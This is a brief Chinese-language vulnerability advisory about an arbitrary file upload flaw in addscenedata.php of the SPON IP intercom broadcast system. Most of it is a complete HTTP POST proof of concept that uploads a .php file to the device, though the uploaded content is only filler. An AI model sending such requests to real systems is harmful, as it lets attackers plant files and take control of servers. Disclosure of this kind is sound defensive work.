SPON IP网络对讲广播系统 addscenedata.php 任意文件上传漏洞

日期: 2021-08-30 | 影响软件: SPON IP网络对讲广播系统 | POC: 已公开

漏洞描述

世邦通信股份有限公司I SPON IP网络对讲广播系统 addscenedata.php 存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。

PoC代码

POST /php/addscenedata.php HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload"; filename="666666.php"
Content-Type: image/png

6666666666666666
------WebKitFormBoundary7MA4YWxkTrZu0gW--

相关漏洞推荐